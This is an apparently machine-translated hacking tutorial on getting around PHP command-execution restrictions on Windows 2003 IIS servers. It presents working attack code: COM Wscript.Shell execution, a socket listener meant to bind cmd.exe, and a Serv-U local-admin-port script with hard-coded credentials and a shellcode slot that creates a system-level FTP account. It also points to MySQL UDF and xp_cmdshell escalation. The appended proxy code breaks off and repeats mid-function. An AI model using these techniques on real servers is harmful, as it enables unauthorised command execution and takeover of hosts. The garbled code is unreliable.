A new way to break through Windows 2003 PHP server

From WIN2000 to win XP, and then to WIN2003, the increase in security for MS IIS servers is obvious. In WIN2000, a normal PHP shell can break it down; In Win XP, even if safe mode = off, you cannot execute system commands with functions such as system (), but we can also use the COM () function to break through; to win 2003, even if both IIS and PHP are installed by default, you use System (), COM () It may not be able to take it. Then you have to use some new methods to make a breakthrough.

1, the Disable_functions breakthrough

In the version above php-4.0.1, PHP.ini introduces a feature disable_functions, which is useful and can be used to disable some functions. For example, in php.ini, add disable_functions = PassThru exec System Popen Then when executing these functions will prompt Warning:system () has been for disabled Ty reasons, and the program terminates running. But there is no way to execute the system command. Because PHP uses a lot of Perl's features, such as the use of (') to execute commands, the sample code is as follows:

$output = ' ls-al '; Echo ' <pre> $output </pre> '; >

It is said that this can only be avoided if it is set to Safe_mode, but the last time I was used on a foreign server, I failed, and I was not always lucky:

2. Application of DL () function

You can try a DL () when any internal command execution and ' ' is not available in PHP, which can only be used for safe mode=off because it is disabled in safe mode. Using DL () You can call the W32API function directly, but this extension has been moved to the PECL library and is no longer bound from the version of PHP 5.1.0. Here are the examples in the manual:

Load this Extension

DL ("Php_w32api.dll");

Register GetTickCount function, from kernel32.dll

W32api_register_function ("Kernel32.dll",

"GetTickCount",

"Long");

Register MessageBoxA function, from User32.dll

W32api_register_function ("User32.dll",

"MessageBoxA",

"Long");

Get Boot time Information

$ticks = GetTickCount ();

Convert to text that is easy to understand

$secs = Floor ($ticks/1000);

$mins = Floor ($secs/60);

$hours = Floor ($mins/60);

$str = sprintf ("You have been the using your computer for:".

"\ r \ n%d milliseconds, or \ r \ n%d Seconds".

"or \ r \ n%d mins or\r\n%d hours%d mins.",

$ticks,

$secs,

$mins,

$hours,

$mins-($hours *60));

Displays a message dialog box with only an OK button and the boot time text above

MessageBoxA (NULL,

$STR,

"Uptime Information",

MB_OK);

?>

Unfortunately I have not yet understood the thorough DL () and the W32api, so I do not give an example, lest mislead the reader.

3. Applications of COM and. Net (Windows) functions

COM (Component object model) is a software specification developed by Microsoft, which is used to develop object-oriented, compiled software components that allow software to be abstracted into binary components, primarily in Windows platforms.

The Windows version of PHP has built-in support for the extension module. COM functions can be used without loading any additional extension libraries. It uses a method similar to the syntax for creating classes in C + + or Java, and passes the class masterpieces of COM to the constructor as arguments. For example, use the Invoke "Wscript.Shell" in PHP to execute system commands:

$cmd = "E:/cert/admin/psexec.exe";

if ($com =new com ("Wscript.Shell")) echo "Yes";

if (! $cmd 1= $com->exec ($cmd))

{

echo "Can not exec ()";

}

if (! $cmd 2= $cmd 1->stdout ())

{

echo "Can not stdout ()";

}

if (! $cmd 3= $cmd 2->readall ())

{

echo "Can not ReadAll ()";

}

echo $cmd 3;

?>

Figure 1 is an example of an executive Psexec.exe I wrote.

This code is exactly the same as the ASP's, and of course you can call "ADODB" like an ASP. Connection ", using this component to combine Jet2 overflow vulnerabilities, might be able to get a shell under PHP Saft mode=on.

Create the database connection

$conn = new COM ("ADODB. Connection ");

$DSN = "Driver={microsoft Access DRIVER (*.mdb)}; Dbq= ". Realpath ("Mydb.mdb");

$conn->open ($DSN);

Pull the data through SQL string

$rs = $conn->execute ("Select Clients from Web");

.....

?>

. NET functions can only run on PHP 5, of course, it requires ". NET runtime" support, and this PHP's an experimental module, the function is not complete, so this is not discussed.

4, Java () function of the application

This method is suitable for safe mode=on. To use the Java module Server, the Java Virtual machine must be installed beforehand, and the With-java option is turned on when the PHP installation is configured, and the code is as follows:

[JAVA]

; This is the path to Php_java.jar.

; Java.class.path =. \php_java.jar

; Path to JDK

; Java.home = f:\jdk1.3.0

; To the path to the virtual machine

; Java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll

Like COM, using Java to create classes (not just JavaBeans) simply passes Java class masterpieces as parameters to the constructor. Here is an example in the manual:

This example was only intended to be run as a CGI.

$frame = new Java (' Java.awt.Frame ', ' PHP ');

$button = new Java (' Java.awt.Button ', ' Hello Java world! ');

$frame->add (' North ', $button);

$frame->validate ();

$frame->pack ();

$frame->visible = True;

$thread = new Java (' Java.lang.Thread ');

$thread->sleep (10000);

$frame->dispose ();

?>

Unfortunately, the Java-enabled PHP server is rare, so there is no more discussion here.

5. Application of socket () function

Socket is a very powerful module in PHP, if you use advanced, abstract interface (by the Fsockopen () and the Psockopen function open socket), you do not need to open "Php_sockets.dll". However, if you want to use the complete socket function block, you must set it in php.ini:

; Windows Extensions

; Note that MySQL and ODBC support are now built in, so no DLL are needed for it.

........

Remove the front semicolon from the following sentence

; Extension=php_sockets.dll

The use of PHP socket function block can implement port forwarding/redirection, packet sniffing, local overflow and other functions, NC can do, most of it can do. Also, it can be used to construct the TCP/UDP server, and I think it is also the best way to break the server security strategy. Here is an example of a TCP server that starts with a port on the server, and you can use it to bundle the Cmd.exe of the server:

Constructing a TCP service on a server

This example requires Php_sockets.dll support.

You can use the Telnet 127.0.0.1 1020 connection after execution

Error_reporting (E_all);

/* Allow The script to hang around waiting for connections. */

Set_time_limit (0);

/* Turn on implicit output flushing so we-what we ' re getting

* as it comes in. *

Ob_implicit_flush ();

Bind IP and port on server

$address = ' 127.0.0.1 ';

$port = 1020;

if ($sock = Socket_create (Af_inet, Sock_stream, sol_tcp)) < 0) {

echo "Socket_create () Failed:reason:". Socket_strerror ($sock). "\ n";

}

if ($ret = Socket_bind ($sock, $address, $port)) < 0) {

echo "Socket_bind () Failed:reason:". Socket_strerror ($ret). "\ n";

}

if ($ret = Socket_listen ($sock, 5)) < 0) {

echo "Socket_listen () Failed:reason:". Socket_strerror ($ret). "\ n";

}

do {

if ($msgsock = socket_accept ($sock)) < 0) {

echo "Socket_accept () Failed:reason:". Socket_strerror ($msgsock). "\ n";

Break

}

/* Send instructions. */

$msg = "\nwelcome to the" PHP Test Server. \ n ".

"To quit, type ' quit '." To shut down the server type ' shutdown '. \ n ';

Socket_write ($msgsock, $msg, strlen ($msg));

do {

if (false = = = Socket_recv ($msgsock, $BUF, 1024, 0)) {

echo "Socket_read () Failed:reason:". Socket_strerror ($ret). "\ n";

Break 2;

}

if (! $buf = Trim ($buf)) {

Continue

}

if ($buf = = ' quit ') {

Break

}

if ($buf = = ' shutdown ') {

Socket_close ($msgsock);

Break 2;

}

$talkback = "Php:you said ' $buf '. \ n";

Socket_write ($msgsock, $talkback, strlen ($talkback));

echo "$BUF \ n";

The following processing received BUF

/*eg: for example

$buf = "Cmd.exe/c Netstat–an";

$PP = Popen (' $buf ', ' R ');

while ($read = Fgets ($pp, 2096))

Echo $read;

Pclose ($PP);

*/

} while (true);

Socket_close ($msgsock);

} while (true);

Socket_close ($sock);

?>

In fact, many hosts are not loaded Php_sockets.dll, fortunately, the socket module does not require the support of the "fsockopen" function is enough for us to use. As long as there is "Fsockopen", we are free to read and write to the external open ports in this machine. Using Fsockopen read-write serv-u local management port 43958 (Note: This port cannot be linked externally) is a typical example:

$adminuser = "Localadministrator";

$adminpass = "#l @ $ak #.lk;0@p";

$adminport = "43958";

$fp = Fsockopen ("127.0.0.1", $adminport, $errno, $ERRSTR, 8);

if (! $fp) {

echo "$errstr ($errno)

\ n ";

} else {

Can be written to $shellcode

Fputs ($fp, $shellcode);

Fputs ($fp, "USER". $adminuser. " \ r \ n ");

Sleep (1);

Fputs ($fp, "Pass". $adminpass. " \ r \ n ");

Sleep (1);

Fputs ($fp, "SITE maintenance\r\n");

Sleep (1);

Fputs ($fp, "-setusersetup\r\n");

Fputs ($fp, "-ip=". $addr. " \ r \ n ");

Fputs ($fp, "-portno=". $ftpport. " \ r \ n ");

Fputs ($fp, "-user=". $user. " \ r \ n ");

Fputs ($fp, "-password=". $password. " \ r \ n ");

Fputs ($fp, "-homedir=". $homedir. " \ r \ n ");

Fputs ($fp, "-loginmesfile=\r\n");

Fputs ($fp, "-disable=0\r\n");

Fputs ($fp, "-relpaths=0\r\n");

Fputs ($fp, "-needsecure=0\r\n");

Fputs ($fp, "-hidehidden=0\r\n");

Fputs ($fp, "-alwaysallowlogin=0\r\n");

Fputs ($fp, "-changepassword=1\r\n");

Fputs ($fp, "-quotaenable=0\r\n");

Fputs ($fp, "-maxusersloginperip=-1\r\n");

Fputs ($fp, "-speedlimitup=-1\r\n");

Fputs ($fp, "-speedlimitdown=-1\r\n");

Fputs ($fp, "-maxnrusers=-1\r\n");

Fputs ($fp, "-idletimeout=600\r\n");

Fputs ($fp, "-sessiontimeout=-1\r\n");

Fputs ($fp, "-expire=0\r\n");

Fputs ($fp, "-ratioup=1\r\n");

Fputs ($fp, "-ratiodown=1\r\n");

Fputs ($fp, "-ratioscredit=0\r\n");

Fputs ($fp, "-quotacurrent=0\r\n");

Fputs ($fp, "-quotamaximum=0\r\n");

Fputs ($fp, "-maintenance=system\r\n");

Fputs ($fp, "-passwordtype=regular\r\n");

Fputs ($fp, "-ratios=none\r\n");

Fputs ($fp, "access=". $homedir. "| Rwamelcdp\r\n ");

Fputs ($fp, "quit\r\n");

Sleep (1);

while (!feof ($fp)) {

Echo fgets ($FP, 128);

}

}

?>

You can also use Fsockopen to write HTTP proxies that allow you to access Web sites that are not externally accessible on the extranet or in this computer. I have a complete httpproxy (Figure 4) with a long code. Interested readers can take a look.

6, Mysql/mssql interface

Unlike Linux, Windows Mysql/mssql is generally run as a system administrator, so as long as you can get the Root/sa password in the native SQL database, you can directly use PHP to connect to the database to execute system commands.

Executing system commands in MySQL takes advantage of the vulnerability of user-defined functions "MySQL UDF Dynamic Library". In MSSQL, as long as the connection to the database, you can directly call the master. xp_cmdshell "extends the command, and the permissions are of course system permissions.

To sum up: Because the system, IIS, PHP version is not the same, the above mentioned several breakthrough methods may change, PHP and many extensions are available, out of system () that several systems command execution function, you may break through the system security policy restrictions!

Attached proxy.php code.

Error_reporting (E_all);

/*

This are free software; You can redistribute it and/or

Modify it under the terms of the GNU general public License

As published by the free Software Foundation; Either version 2

The License, or (at your option) any later version.

//

This are distributed in the hope that it'll be useful,

but without any WARRANTY; Without even the implied warranty of

merchantability or FITNESS for A particular purpose. The

The GNU general public License for the more details.

//

You are should have received a copy of the GNU general public License

Along with this program; If not, write to the free Software

Foundation, Inc., Temple Place-suite, Boston, MA 02111-1307, USA.

//-------------------------------------------------------------------

Class:phproxy

Author:ultimategamer00 (Abdullah A.)

Last modified:6:28 PM 6/22/2004

*/

function __stripslashes ($STR)

{

Return GET_MAGIC_QUOTES_GPC ()? Stripslashes ($STR): $str;

}

if (!function_exists (' str_rot13 '))

{

function str_rot13 ($STR)

{

Static $alpha = Array (' ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ ',

' NOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLM ');

Return Strtr ($str, $alpha [0], $alpha [1]);

}

}

Class Phproxy

{

var $allowed _hosts = Array ();

var $version;

var $script _url;

var $url;

var $url _segments;

var $flags = array (' Include_form ' => 1, ' remove_scripts ' => 1, ' accept_cookies ' => 1, ' show_images ' => 1, ' Sho W_referer ' => 1);

var $socket;

var $content _type;

var $request _headers;

var $post _body;

var $response _headers;

var $response _body;

function Phproxy ($flags = ' previous ')

{

$this->version = ' 0.2 ';

$this->script_url = ' http '

. (Isset (

function Set_request_headers ()

{

$headers = "". (Isset ($this->url_segments[' query ')? "?" : '') . "Http/1.0\r\n";

$headers. = "Host:: \ r \ n";

$headers. = "user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) \ r \ n ";

$headers. = "Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng, Image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n ";

$headers. = "connection:close\r\n";

if ($this->flags[' show_referer '] = = 1)

{

$headers. = "Referer: \ r \ n";

}

$cookies = $this->get_cookies ();

$headers. = $cookies!= '? "Cookie: $cookies \ r \ n": ";

if (

function Set_request_headers ()

{

$headers = "". (Isset ($this->url_segments[' query ')? "?" : '') . "Http/1.0\r\n";

$headers. = "Host:: \ r \ n";

$headers. = "user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) \ r \ n ";

$headers. = "Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng, Image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n ";

$headers. = "connection:close\r\n";

if ($this->flags[' show_referer '] = = 1)

{

$headers. = "Referer: \ r \ n";

}

$cookies = $this->get_cookies ();

$headers. = $cookies!= '? "Cookie: $cookies \ r \ n": ";

if (